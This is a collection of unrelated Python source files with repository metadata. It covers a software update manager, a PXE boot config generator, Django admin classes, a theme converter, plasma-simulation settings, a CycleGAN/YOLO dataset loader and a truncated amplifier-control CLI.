8c3f840f88ca3515cc812078a620e2a845978177
|
[
"MIT"
] | 30
|
2017-02-16T19:43:18.000Z
|
2018-01-17T21:17:01.000Z
|
IOController/src/UpdateManager.py
|
MicrosoftDX/liquidintel
|
8c3f840f88ca3515cc812078a620e2a845978177
|
[
"MIT"
] | 6
|
2017-02-24T03:40:04.000Z
|
2020-11-22T20:29:11.000Z
|
import os, sys, logging, threading, tempfile, shutil, tarfile, inspect
from ConfigParser import RawConfigParser
import requests
from DXLiquidIntelApi import DXLiquidIntelApi
log = logging.getLogger(__name__)
class UpdateManager:
def __init__(self, liquidApi, packageType, checkUnpublished, packageCheckInterval, configuredInstallDir):
self._liquidApi = liquidApi
# We assume the last segment in the installation directory is the version label
(self._baseInstallDir, self._semanticVersion) = os.path.split(self._getInstallDir(configuredInstallDir))
self._packageType = packageType
self._checkUnpublished = checkUnpublished
self._packageCheckInterval = packageCheckInterval
self._restartRequired = False
# Initial check is synchronous
self.checkForNewVersion()
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
if self._timer:
self._timer.cancel()
def checkForNewVersion(self):
self._timer = None
restartTimer = True
log.info('Checking for newer version from package manager api')
packages = self._liquidApi.getInstallationPackages(self._semanticVersion, self._packageType.value, self._checkUnpublished.value)
if len(packages) > 0:
log.info('New installation packages detected: %s', packages)
installPackage = packages[-1]
newInstallDir = os.path.join(self._baseInstallDir, installPackage["Version"])
log.info('Installing package version: %s at: %s. Download location: %s. %s', installPackage["Version"], newInstallDir, installPackage["PackageUri"], installPackage["Description"])
try:
# Download the package
downloadReq = requests.get(installPackage["PackageUri"], stream = True)
downloadReq.raise_for_status()
# Create a new installation directory, using the version label
if os.path.exists(newInstallDir):
log.warning('Installation directory %s already exists - this will overwrite existing contents', newInstallDir)
else:
os.makedirs(newInstallDir)
# Assume package content is .tar.gz - unfortunately we can't stream the response directly into the tar extractor as the
# HTTP response stream doesn't support seek()
with tempfile.NamedTemporaryFile(prefix="package-tarball-", suffix=".tar.gz", delete=False) as fd:
shutil.copyfileobj(downloadReq.raw, fd)
fd.seek(0)
tar = tarfile.open(fileobj=fd)
tar.extractall(newInstallDir)
# Point the symlink to the new directory
if sys.platform != 'win32':
currentSymlink = os.path.join(self._baseInstallDir, 'current')
if os.path.exists(currentSymlink):
os.remove(currentSymlink)
os.symlink(newInstallDir, currentSymlink)
# Check if this version has any configuration that we need to apply locally
if 'Configuration' in installPackage and installPackage['Configuration']:
configFile = os.path.join(newInstallDir, 'IOController.cfg')
log.info('Writing version-specific configuration to: %s', configFile)
config = RawConfigParser()
# Convert from JSON form to .INI form by intepreting all object values as sections
# and all others as primitive values in the parent section
# Top level should be section names with values
for (section, values) in installPackage['Configuration'].items():
if not isinstance(values, dict):
log.warning('Package configuration for keg/section: %s does not contain an object. Non-objects are not supported.', section)
else:
config.add_section(section)
for (setting, value) in values.items():
config.set(section, setting, value)
with open(configFile, 'w') as fd:
config.write(fd)
self._restartRequired = True
# No need to restart the timer as we're bailing on the next main loop iteration
restartTimer = False
except:
log.warning('Failed to download installation package. Will retry on next interval.', exc_info=1)
if restartTimer:
self._timer = threading.Timer(self._packageCheckInterval.value, self.checkForNewVersion)
self._timer.start()
@property
def restartRequired(self):
return self._restartRequired
@property
def semanticVersion(self):
return self._semanticVersion
def _getInstallDir(self, configuredInstallDir):
if configuredInstallDir or sys.platform == 'win32':
return configuredInstallDir
return os.path.dirname(os.path.realpath(inspect.getabsfile(UpdateManager)))
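# --- Hedged illustration (not part of the original class) ---
# checkForNewVersion() spools the HTTP response into a temporary file before
# extracting, because tarfile needs a seekable stream. The same pattern in
# isolation (the URL is a placeholder):
@staticmethod
def _download_and_extract_example(url, dest_dir):
    resp = requests.get(url, stream=True)
    resp.raise_for_status()
    with tempfile.NamedTemporaryFile(suffix='.tar.gz') as fd:
        shutil.copyfileobj(resp.raw, fd)  # spool to disk so we can seek()
        fd.seek(0)
        tarfile.open(fileobj=fd).extractall(dest_dir)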
| 51.940594
| 191
| 0.62276
| 510
| 5,246
| 6.319608
| 0.411765
| 0.014893
| 0.009308
| 0.008688
| 0.017375
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002186
| 0.302326
| 5,246
| 100
| 192
| 52.46
| 0.878415
| 0.138582
| 0
| 0.052632
| 0
| 0.013158
| 0.130551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.092105
| false
| 0.013158
| 0.052632
| 0.026316
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a834a938200061353abd64e3aa79cc1eac77b3bf
| 2,511
|
py
|
Python
|
python/jinja2_template.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
python/jinja2_template.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
python/jinja2_template.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | 1
|
2018-08-17T07:07:15.000Z
|
2018-08-17T07:07:15.000Z
|
#!/usr/bin/env python
import os
from jinja2 import Environment, FileSystemLoader
PATH = os.path.dirname(os.path.abspath(__file__))
env = Environment(loader=FileSystemLoader(os.path.join(PATH, 'templates')))
mac_addr = "01:23:45:67:89:01"
PXE_ROOT_DIR = "/data/tftpboot"
pxe_options = {
'os_distribution': 'centos7',
'path_to_vmlinuz': os.path.join(PXE_ROOT_DIR, 'node', mac_addr, 'vmlinuz'),
'path_to_initrd': os.path.join(PXE_ROOT_DIR, 'node', mac_addr, 'initrd.img'),
'path_to_kickstart_cfg': os.path.join(PXE_ROOT_DIR, 'node', mac_addr, 'ks.cfg'),
'pxe_server_ip': '128.0.0.1',
'protocol': 'nfs'
}
def build_pxe_config(ctxt, template):
"""Build the PXE boot configuration file.
This method builds the PXE boot configuration file by rendering the
template with the given parameters.
:param ctxt: A dict of values to render into the configuration file.
:param template: Path to the PXE configuration template.
:returns: A formatted string with the file content.
"""
tmpl_path, tmpl_file = os.path.split(template)
env = Environment(loader=FileSystemLoader(tmpl_path))
template = env.get_template(tmpl_file)
return template.render(ctxt)
def get_pxe_mac_path(mac, delimiter=None):
"""Convert a MAC address into a PXE config file name.
:param mac: A MAC address string in the format xx:xx:xx:xx:xx:xx.
:param delimiter: The MAC address delimiter. Defaults to dash ('-').
:returns: the path to the config file.
"""
if delimiter is None:
delimiter = '-'
mac_file_name = mac.replace(':', delimiter).lower()
mac_file_name = '01-' + mac_file_name
return os.path.join(PXE_ROOT_DIR, 'pxelinux.cfg', mac_file_name)
def get_tmpl_path():
    """Return the path to the PXE config template file."""
    return os.path.join(PXE_ROOT_DIR, 'template', '01-xx-xx-xx-xx-xx-xx.template')
#def render_template(template_filename, context):
# return env.get_template(template_filename).render(context)
def create_pxe_config_file(pxe_options):
# fname = "output.html"
cname = get_pxe_mac_path(mac_addr)
tname = get_tmpl_path()
context = {
'pxe_opts': pxe_options
}
with open(cname, 'w') as f:
config = build_pxe_config(context, tname)
f.write(config)
########################################
if __name__ == "__main__":
create_pxe_config_file(pxe_options)
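# --- Hedged illustration (not part of the original script) ---
# build_pxe_config renders a template loaded from disk; the same Jinja2
# rendering can be shown with an inline template string (contents made up):
def demo_render_inline():
    from jinja2 import Template
    demo = Template("default linux\nkernel {{ pxe_opts.path_to_vmlinuz }}\n")
    return demo.render({'pxe_opts': pxe_options})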
| 31
| 84
| 0.68419
| 364
| 2,511
| 4.486264
| 0.318681
| 0.024495
| 0.029394
| 0.029394
| 0.22229
| 0.169626
| 0.119412
| 0.05695
| 0.05695
| 0
| 0
| 0.011679
| 0.181601
| 2,511
| 80
| 85
| 31.3875
| 0.782968
| 0.329351
| 0
| 0
| 0
| 0
| 0.159669
| 0.031807
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.052632
| 0
| 0.236842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a837db7dbbd9e3811093f9342986a637e65f9e07
| 1,101
|
py
|
Python
|
school_system/users/admin.py
|
SanyaDeath/BIA-school-system
|
d07e4e86f91cf1e24c211cc9f5524c50da45b0e5
|
[
"BSD-3-Clause"
] | null | null | null |
school_system/users/admin.py
|
SanyaDeath/BIA-school-system
|
d07e4e86f91cf1e24c211cc9f5524c50da45b0e5
|
[
"BSD-3-Clause"
] | null | null | null |
school_system/users/admin.py
|
SanyaDeath/BIA-school-system
|
d07e4e86f91cf1e24c211cc9f5524c50da45b0e5
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin
from .models import Student, User
admin.site.site_header = 'BIA SCHOOL SYSTEM'
class UserAdmin(DjangoUserAdmin):
model = User
fieldsets = DjangoUserAdmin.fieldsets + ((None, {
'fields': ('role', 'middle_name',
'birth_date')}),)
list_display = ('role', 'last_name', 'first_name',
'middle_name', 'birth_date')
def save_model(self, request, obj, form, change):
if request.user.is_teacher:
obj.is_staff = True
obj.save()
admin.site.register(User, UserAdmin)
class StudentUser(UserAdmin):
model = Student
fieldsets = UserAdmin.fieldsets + ((None, {
'fields': ('entry_year', 'klass')}),)
list_display = ('role', 'last_name', 'first_name',
'middle_name', 'birth_date',
'entry_year', 'klass')
search_fields = ('last_name', 'first_name',
'middle_name', 'entry_year', 'klass')
admin.site.register(Student, StudentUser)
| 28.230769
| 66
| 0.613079
| 119
| 1,101
| 5.478992
| 0.411765
| 0.06135
| 0.069018
| 0.087423
| 0.197853
| 0.197853
| 0.156442
| 0.156442
| 0.156442
| 0.156442
| 0
| 0
| 0.254314
| 1,101
| 38
| 67
| 28.973684
| 0.794153
| 0
| 0
| 0.076923
| 0
| 0
| 0.197094
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5179adb5c10e59288f470f8fa76ecec344ba97b
| 1,111
|
py
|
Python
|
converter.py
|
ownerofworld/TDroidDesk
|
5c773f15d764e6cff468bb39ed40dca5ba07d902
|
[
"MIT"
] | 20
|
2017-02-22T18:36:57.000Z
|
2022-03-23T11:03:35.000Z
|
converter.py
|
extratone/TDroidDesk
|
e778463e996368374c856e6154dc0885df1f3c11
|
[
"MIT"
] | 3
|
2017-02-23T03:51:07.000Z
|
2017-03-26T15:06:35.000Z
|
converter.py
|
extratone/TDroidDesk
|
e778463e996368374c856e6154dc0885df1f3c11
|
[
"MIT"
] | 9
|
2017-02-23T19:39:20.000Z
|
2022-01-02T03:28:01.000Z
|
# coding: utf-8
"""Converter module."""
import util
THEME = 'theme'
BACKGROUND = 'background'
class ThemeConverter(object):
"""Object that converts themes using given map file."""
def __init__(self, theme_map, transp_map):
"""Constructor."""
self.theme_map = theme_map
self.transp_map = transp_map
def convert(self, source_theme):
"""Create object that describes desktop theme.
Arguments:
source_theme - theme object
"""
target_theme = util.get_empty_theme()
for desktop_key, att_key in self.theme_map.items():
if att_key not in source_theme[THEME]:
# print('Missing {0} key in source theme'.format(att_key))
continue
color = source_theme[THEME][att_key]
if desktop_key in self.transp_map:
alpha = self.transp_map[desktop_key]
color = util.apply_transparency(color, alpha)
target_theme[THEME][desktop_key] = color
target_theme[BACKGROUND] = source_theme[BACKGROUND]
return target_theme
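# --- Hedged usage sketch (illustration only; the two `util` helpers this
# class relies on are stubbed here because that module is not shown):
@staticmethod
def _demo_convert():
    class _UtilStub(object):
        @staticmethod
        def get_empty_theme():
            return {THEME: {}, BACKGROUND: None}
        @staticmethod
        def apply_transparency(color, alpha):
            return color + format(alpha, '02x')
    global util
    util = _UtilStub  # shadow the imported module for this demo only
    conv = ThemeConverter({'panel_bg': 'bg_color'}, {'panel_bg': 255})
    src = {THEME: {'bg_color': '#102030'}, BACKGROUND: 'wall.png'}
    return conv.convert(src)  # -> panel_bg '#102030ff', background kept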
| 26.452381
| 74
| 0.621062
| 131
| 1,111
| 5.015267
| 0.381679
| 0.100457
| 0.054795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002519
| 0.285329
| 1,111
| 41
| 75
| 27.097561
| 0.824937
| 0.212421
| 0
| 0
| 0
| 0
| 0.018116
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.052632
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5195d6a3d0b3fd5a3b08706a1231fda25ed0eb8
| 2,252
|
py
|
Python
|
py/DREAM/Settings/Equations/RunawayElectronDistribution.py
|
chalmersplasmatheory/DREAM
|
715637ada94f5e35db16f23c2fd49bb7401f4a27
|
[
"MIT"
] | 12
|
2020-09-07T11:19:10.000Z
|
2022-02-17T17:40:19.000Z
|
py/DREAM/Settings/Equations/RunawayElectronDistribution.py
|
chalmersplasmatheory/DREAM
|
715637ada94f5e35db16f23c2fd49bb7401f4a27
|
[
"MIT"
] | 110
|
2020-09-02T15:29:24.000Z
|
2022-03-09T09:50:01.000Z
|
py/DREAM/Settings/Equations/RunawayElectronDistribution.py
|
chalmersplasmatheory/DREAM
|
715637ada94f5e35db16f23c2fd49bb7401f4a27
|
[
"MIT"
] | 3
|
2021-05-21T13:24:31.000Z
|
2022-02-11T14:43:12.000Z
|
import numpy as np
from DREAM.Settings.Equations.EquationException import EquationException
from . import DistributionFunction as DistFunc
from . DistributionFunction import DistributionFunction
from .. TransportSettings import TransportSettings
INIT_FORWARD = 1
INIT_XI_NEGATIVE = 2
INIT_XI_POSITIVE = 3
INIT_ISOTROPIC = 4
class RunawayElectronDistribution(DistributionFunction):
def __init__(self, settings,
fre=[0.0], initr=[0.0], initp=[0.0], initxi=[0.0],
initppar=None, initpperp=None,
rn0=None, n0=None, rT0=None, T0=None, bc=DistFunc.BC_PHI_CONST,
ad_int_r=DistFunc.AD_INTERP_CENTRED,
ad_int_p1=DistFunc.AD_INTERP_CENTRED,
ad_int_p2=DistFunc.AD_INTERP_CENTRED,
ad_jac_r=DistFunc.AD_INTERP_JACOBIAN_LINEAR,
ad_jac_p1=DistFunc.AD_INTERP_JACOBIAN_LINEAR,
ad_jac_p2=DistFunc.AD_INTERP_JACOBIAN_LINEAR,
fluxlimiterdamping=1.0):
"""
Constructor.
"""
super().__init__(settings=settings, name='f_re', grid=settings.runawaygrid,
f=fre, initr=initr, initp=initp, initxi=initxi, initppar=initppar,
initpperp=initpperp, rn0=rn0, n0=n0, rT0=rT0, T0=T0,
bc=bc, ad_int_r=ad_int_r, ad_int_p1=ad_int_p1,
ad_int_p2=ad_int_p2, fluxlimiterdamping=fluxlimiterdamping)
self.inittype = INIT_FORWARD
def setInitType(self, inittype):
"""
Specifies how the runaway electron distribution function f_re should be
initialized from the runaway density n_re.
:param int inittype: Flag indicating how to initialize f_re.
"""
self.inittype = int(inittype)
def fromdict(self, data):
"""
Load data for this object from the given dictionary.
"""
super().fromdict(data)
def scal(v):
if type(v) == np.ndarray: return v[0]
else: return v
if 'inittype' in data:
self.inittype = int(scal(data['inittype']))
def todict(self):
"""
Returns a Python dictionary containing all settings of
this RunawayElectronDistribution object.
"""
d = super().todict()
d['inittype'] = self.inittype
return d
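# --- Hedged illustration (not part of the original class) ---
# fromdict() goes through the small scal() helper because settings loaded
# back from file may arrive either as plain scalars or as length-1 numpy
# arrays. The same pattern in isolation:
@staticmethod
def _scal_example(v):
    return v[0] if type(v) == np.ndarray else v
# _scal_example(np.array([INIT_FORWARD])) == 1 == _scal_example(INIT_FORWARD)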
| 30.026667
| 83
| 0.655861
| 278
| 2,252
| 5.097122
| 0.366906
| 0.031757
| 0.067749
| 0.048694
| 0.149612
| 0.08892
| 0.0494
| 0
| 0
| 0
| 0
| 0.020784
| 0.25222
| 2,252
| 74
| 84
| 30.432432
| 0.820665
| 0.150089
| 0
| 0
| 0
| 0
| 0.015608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b51c95bad3faa026a48a62db4fc8bca989c644e2
| 7,561
|
py
|
Python
|
data/unaligned_dataset.py
|
basicskywards/cyclegan-yolo
|
536498706da30707facf1211355ff21df2e5b227
|
[
"BSD-3-Clause"
] | null | null | null |
data/unaligned_dataset.py
|
basicskywards/cyclegan-yolo
|
536498706da30707facf1211355ff21df2e5b227
|
[
"BSD-3-Clause"
] | null | null | null |
data/unaligned_dataset.py
|
basicskywards/cyclegan-yolo
|
536498706da30707facf1211355ff21df2e5b227
|
[
"BSD-3-Clause"
] | null | null | null |
import os.path
import torchvision.transforms as transforms
from data.base_dataset import BaseDataset, get_transform
from data.image_folder import make_dataset
from PIL import Image
import PIL
from pdb import set_trace as st
import torch
import numpy as np
#from yolo.utils.datasets import pad
#import torchvision.transforms as transforms
from yolo.utils.datasets import pad_to_square, resize, pad_to_square2
class UnalignedDataset(BaseDataset): # I/O for hybrid YOLOv3 + CycleGAN! Unsupported for batch data for YOLOv3
def initialize(self, opt, normalized_labels = True):
self.opt = opt
self.root = opt.dataroot
self.normalized_labels = normalized_labels
# self.dir_A = os.path.join(opt.dataroot, opt.phase + 'A')
# self.dir_B = os.path.join(opt.dataroot, opt.phase + 'B')
self.dir_A = os.path.join(opt.dataroot, 'A_train.txt') # A.txt contains a list of path/to/img1.jpg
self.dir_B = os.path.join(opt.dataroot, 'B_train.txt')
self.A_paths = make_dataset(self.dir_A)
self.B_paths = make_dataset(self.dir_B)
self.A_paths = sorted(self.A_paths)
self.B_paths = sorted(self.B_paths)
self.A_size = len(self.A_paths)
self.B_size = len(self.B_paths)
self.transform = get_transform(opt) # transform for cyclegan
# prepare targets for yolo
self.A_label_files = [
path.replace("images", "labels").replace(".png", ".txt").replace(".jpg", ".txt")
for path in self.A_paths
]
# self.A_label_files = [
# path.replace("images", "labels").replace(".png", ".txt").replace(".jpg", ".txt").replace("rainy/", "").replace("cloudy1000/", "").replace("sunny/", "").replace("night_or_night_and_rainy/", "")
# for path in self.A_paths
# ]
self.B_label_files = [
path.replace("images", "labels").replace(".png", ".txt").replace(".jpg", ".txt").replace("rainy/", "").replace("cloudy1000/", "").replace("sunny/", "").replace("night_or_night_and_rainy/", "")
for path in self.B_paths
]
def __getitem__(self, index):
A_path = self.A_paths[index % self.A_size]
B_path = self.B_paths[index % self.B_size]
A_path = A_path.strip('\n')
B_path = B_path.strip('\n')
#print('A_path = ', A_path)
A_img = Image.open(A_path).convert('RGB')
B_img = Image.open(B_path).convert('RGB')
#img = transforms.ToTensor()(Image.open(img_path).convert('RGB'))
tmp_A = transforms.ToTensor()(A_img)
#print('\n**************************************************A_img.shape = ', tmp_A.shape)
_, h, w = tmp_A.shape
h_factor, w_factor = (h, w) if self.normalized_labels else (1, 1)
# Pad to square resolution
tmp_A, pad = pad_to_square2(tmp_A, 0)
_, padded_h, padded_w = tmp_A.shape
tmp_B = transforms.ToTensor()(B_img)
#print('\n**************************************************A_img.shape = ', tmp_A.shape)
_, hB, wB = tmp_B.shape
h_factorB, w_factorB = (hB, wB) if self.normalized_labels else (1, 1)
# Pad to square resolution
tmp_B, padB = pad_to_square2(tmp_B, 0)
_, padded_hB, padded_wB = tmp_B.shape
A_img = self.transform(A_img)
B_img = self.transform(B_img)
# ---------
# Label
# ---------
def label_path2bboxes(label_path, pad, h_factor, w_factor, padded_h, padded_w):
tmp_targets = None
if os.path.exists(label_path):
boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))
# Extract coordinates for unpadded + unscaled image
x1 = w_factor * (boxes[:, 1] - boxes[:, 3] / 2)
y1 = h_factor * (boxes[:, 2] - boxes[:, 4] / 2)
x2 = w_factor * (boxes[:, 1] + boxes[:, 3] / 2)
y2 = h_factor * (boxes[:, 2] + boxes[:, 4] / 2)
# Adjust for added padding
x1 += pad[0]
y1 += pad[2]
x2 += pad[1]
y2 += pad[3]
# Returns (x, y, w, h) in scale [0, 1]
boxes[:, 1] = ((x1 + x2) / 2) / padded_w
boxes[:, 2] = ((y1 + y2) / 2) / padded_h
boxes[:, 3] *= w_factor / padded_w
boxes[:, 4] *= h_factor / padded_h
#print('\nboxes x y w h: ', boxes)
tmp_targets = torch.zeros((len(boxes), 6))
tmp_targets[:, 1:] = boxes
return tmp_targets
label_path = self.A_label_files[index % len(self.A_paths)].rstrip()
A_targets = label_path2bboxes(label_path, pad, h_factor, w_factor, padded_h, padded_w)
label_path_B = self.B_label_files[index % len(self.B_paths)].rstrip()
B_targets = label_path2bboxes(label_path_B, padB, h_factorB, w_factorB, padded_hB, padded_wB)
#print('targets = ', targets)
#targets = generate_YOLO_targets(self.bbox) # A_path = A_annotation
# return {'A': A_img, 'B': B_img,
# 'A_paths': A_path, 'B_paths': B_path,
# 'targets': targets}
return {'A': A_img, 'B': B_img,
'A_paths': A_path, 'B_paths': B_path,
'A_targets': A_targets, 'B_targets': B_targets} # add B_bbox, A_bbox
def collate_fn(self, batch):
# input images will be resized to 416
# this collate_fn supports batchSize >= 2
#print('collate fn: ', zip(*batch))
tmp = list(batch)
#print('tmp = ', len(tmp))
target_As = [data['A_targets'] for data in tmp if data['A_targets'] is not None]
#print('targets_As = ', target_As)
for i, boxes in enumerate(target_As):
boxes[:, 0] = i
target_As = torch.cat(target_As, 0) # BUG
#print('target_As: ', target_As.shape)
#print('target_As cat = ', target_As)
target_Bs = [data['B_targets'] for data in tmp if data['B_targets'] is not None]
for i, boxes in enumerate(target_Bs):
boxes[:, 0] = i
#print('\ntarget_Bs: ', target_Bs)
#target_Bs = torch.cat(target_Bs, 0) # BUG
As = torch.stack([data['A'] for data in tmp])
Bs = torch.stack([data['B'] for data in tmp])
path_As = [data['A_paths'] for data in tmp]
#path_As = torch.cat(path_As, 0)
path_Bs = [data['B_paths'] for data in tmp]
#path_Bs = torch.cat(path_Bs, 0)
# paths, imgs, targets = list(zip(*batch))
# # Remove empty placeholder targets
# targets = [boxes for boxes in targets if boxes is not None]
# # Add sample index to targets
# for i, boxes in enumerate(targets):
# boxes[:, 0] = i
# targets = torch.cat(targets, 0)
# # Selects new image size every tenth batch
# if self.multiscale and self.batch_count % 10 == 0:
# self.img_size = random.choice(range(self.min_size, self.max_size + 1, 32))
# # Resize images to input shape
# imgs = torch.stack([resize(img, self.img_size) for img in imgs])
# self.batch_count += 1
return {'A': As, 'B': Bs,
'A_paths': path_As, 'B_paths': path_Bs,
'A_targets': target_As, 'B_targets': target_Bs}
def __len__(self):
return max(self.A_size, self.B_size)
def name(self):
return 'UnalignedDataset'
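# --- Hedged illustration (not part of the original dataset logic) ---
# label_path2bboxes rescales normalized (cx, cy, w, h) labels after an image
# has been padded to a square. The same arithmetic in isolation, for a
# 200x100 image padded to 200x200 (pad = left, right, top, bottom):
@staticmethod
def _rescale_box_example():
    w_factor, h_factor = 200, 100
    pad = (0, 0, 50, 50)
    padded_w, padded_h = 200, 200
    boxes = torch.tensor([[0.0, 0.5, 0.5, 0.2, 0.4]])  # cls, cx, cy, w, h
    x1 = w_factor * (boxes[:, 1] - boxes[:, 3] / 2) + pad[0]
    y1 = h_factor * (boxes[:, 2] - boxes[:, 4] / 2) + pad[2]
    x2 = w_factor * (boxes[:, 1] + boxes[:, 3] / 2) + pad[1]
    y2 = h_factor * (boxes[:, 2] + boxes[:, 4] / 2) + pad[3]
    # The box stays centred: both values come out as 0.5
    return ((x1 + x2) / 2 / padded_w, (y1 + y2) / 2 / padded_h)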
| 40.005291
| 206
| 0.562492
| 1,031
| 7,561
| 3.903977
| 0.173618
| 0.017391
| 0.019876
| 0.017888
| 0.358261
| 0.308571
| 0.244969
| 0.201491
| 0.172671
| 0.159255
| 0
| 0.015264
| 0.289512
| 7,561
| 188
| 207
| 40.218085
| 0.733991
| 0.297183
| 0
| 0.020619
| 0
| 0
| 0.0518
| 0.004761
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061856
| false
| 0
| 0.103093
| 0.020619
| 0.226804
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b51f90c659e185b69613117f368541efd8ec132f
| 8,396
|
py
|
Python
|
primare_control/primare_interface.py
|
ZenithDK/primare-control
|
597a2dd15bedb511fab5cca8d01044692d1e2d96
|
[
"Apache-2.0"
] | null | null | null |
primare_control/primare_interface.py
|
ZenithDK/primare-control
|
597a2dd15bedb511fab5cca8d01044692d1e2d96
|
[
"Apache-2.0"
] | null | null | null |
primare_control/primare_interface.py
|
ZenithDK/primare-control
|
597a2dd15bedb511fab5cca8d01044692d1e2d96
|
[
"Apache-2.0"
] | null | null | null |
"""Interface to Primare amplifiers using Twisted SerialPort.
This module allows you to control your Primare I22 and I32 amplifier from the
command line using Primare's binary protocol via the RS232 port on the
amplifier.
"""
import logging
import click
from contextlib import closing
from primare_control import PrimareController
# from twisted.logger import (
# FilteringLogObserver,
# globalLogBeginner,
# Logger,
# LogLevel,
# LogLevelFilterPredicate,
# textFileLogObserver
# )
# log = Logger()
# globalLogBeginner.beginLoggingTo([
# FilteringLogObserver(
# textFileLogObserver(sys.stdout),
# [LogLevelFilterPredicate(LogLevel.debug)]
# )
# ])
# Setup logging so that is available
FORMAT = '%(asctime)-15s %(name)s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
logger = logging.getLogger(__name__)
class DefaultCmdGroup(click.Group):
"""Custom implementation for handling Primare methods in a unified way."""
def list_commands(self, ctx):
"""List Primare Control methods."""
rv = [method for method in dir(PrimareController)
if not method.startswith('_')]
rv.append('interactive')
rv.sort()
return rv
def get_command(self, ctx, name):
"""Return click command."""
@click.pass_context
def subcommand(*args, **kwargs):
#logger.debug("subcommand args: {}".format(args))
#logger.debug("subcommand kwargs: {}".format(kwargs))
ctx = args[0]
params = ctx.obj['parameters']
ctx.obj['p_ctrl'] = PrimareController(port=params['port'],
baudrate=params['baudrate'],
source=None,
volume=None,
debug=params['debug'])
with closing(ctx.obj['p_ctrl']):
try:
if ctx.obj['parameters']['amp_info']:
ctx.obj['p_ctrl'].setup()
method = getattr(PrimareController, name)
if len(kwargs):
method(ctx.obj['p_ctrl'], int(kwargs['value']))
else:
method(ctx.obj['p_ctrl'])
except KeyboardInterrupt:
logger.info("User aborted")
except TypeError as e:
logger.error(e)
if name == "interactive":
cmd = click.Group.get_command(self, ctx, 'interactive')
else:
if name in [method for method in dir(PrimareController)
if not method.startswith('_')]:
# attach doc from original callable so it will appear in CLI
# output
subcommand.__doc__ = getattr(PrimareController, name).__doc__
if getattr(PrimareController,
name).__func__.__code__.co_argcount > 1:
params_arg = [click.Argument(("value",))]
else:
params_arg = None
cmd = click.Command(name,
params=params_arg,
callback=subcommand)
else:
#logger.debug("get_command no_such_cmd")
cmd = None
return cmd
@click.command(cls=DefaultCmdGroup)
@click.pass_context
@click.option("--amp-info",
default=False,
is_flag=True,
help="Retrieve and print amplifier information")
@click.option("--baudrate",
default='4800',
type=click.Choice(['300',
'1200',
'2400',
'4800',
'9600',
'19200',
'57600',
'115200']),
help="Serial port baudrate. For I22 it _must_ be 4800.")
@click.option("--debug",
"-d",
default=False,
is_flag=True,
help="Enable debug output.")
@click.option("--port",
"-p",
default="/dev/ttyUSB0",
help="Serial port to use (e.g. 3 for a COM port on Windows, "
"/dev/ttyATH0 for Arduino Yun, /dev/ttyACM0 for Serial-over-USB "
"on RaspberryPi.")
def cli(ctx, amp_info, baudrate, debug, port):
"""Prototype command."""
try:
# on Windows, we need port to be an integer
port = int(port)
except ValueError:
pass
ctx.obj = {}
ctx.obj['p_ctrl'] = None
ctx.obj['parameters'] = {
'amp_info': amp_info,
'baudrate': baudrate,
'debug': debug,
'port': port,
}
@cli.command()
@click.pass_context
def interactive(ctx):
"""Start interactive shell for controlling a Primare amplifier.
Press enter (blank line), 'q' or 'quit' to exit.
For a list of available commands, type 'help'
"""
method_list = [
(method,
getattr(PrimareController, method).__doc__) for
method in dir(PrimareController) if not method.startswith('_')]
help_string = """To exit, press enter (blank line) or type 'q' or 'quit'.\n
Available commands are:
